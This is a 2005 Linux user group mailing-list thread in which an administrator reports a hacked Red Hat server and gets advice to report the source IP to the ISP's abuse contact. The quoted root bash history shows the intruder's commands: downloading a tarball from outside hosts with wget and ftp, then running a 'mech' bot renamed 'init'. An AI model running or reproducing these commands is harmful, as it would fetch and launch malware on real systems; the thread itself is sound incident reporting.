[wellylug] Think I've had a server hacked
Jamie Baddeley
wellylug at vpc.co.nz
Wed Oct 26 22:49:06 NZDT 2005
at the very least you should try this:
% Information related to '82.123.175.0 - 82.123.175.255'
inetnum: 82.123.175.0 - 82.123.175.255
netname: IP2000-ADSL-BAS
descr: BSTUI152 Tuileries Bloc2
country: FR
admin-c: WITR1-RIPE
tech-c: WITR1-RIPE
status: ASSIGNED PA
remarks: for hacking, spamming or security problems send mail to
remarks: postmaster at wanadoo.fr AND abuse at wanadoo.fr
mnt-by: FT-BRX
source: RIPE # Filtered
send them mail. Yes, 82.123.175.245 may simply be a compromised jump
point, but it costs nothing to let them know.
jamie
On Wed, 2005-10-26 at 10:25 +1300, Mark Signal wrote:
> Hi
>
> I setup a box ages ago for a client - redhat 7.2/Mitel with only ssh port
> open
>
> root password just got changed and /var/log/auth deleted
> last login from 82.123.175.245 (somewhere in europe - normally only
> connections from Lower Hutt :)
> root bash history has..
> w
> passwd
> uname -a
> ps x
> w
> cd /var/tmp
> ls
> wget hash.idilis.ro/root.tar.gz
> wget 217.156.85.3/root.tar.gz
> fr hash.idilis.ro
> ftp hash.idilis.ro
> ftp 217.156.85.3
> tar xzvf mech*
> cd mech
> mv bash init
> PATH=:.PATH
> init
> init
> init
>
> I am copying all the data off (including /var/logs/) and will
> reinstall/update and shift ssh port
>
> is there anything else I can/should do?
>
> cheers
>
>
> Mark
>
>
>
>
> --
> No virus found in this outgoing message.
> Checked by AVG Free Edition.
> Version: 7.1.361 / Virus Database: 267.12.5/147 - Release Date: 24/10/2005
>
--
Jamie Baddeley <wellylug at vpc.co.nz>
More information about the wellylug
mailing list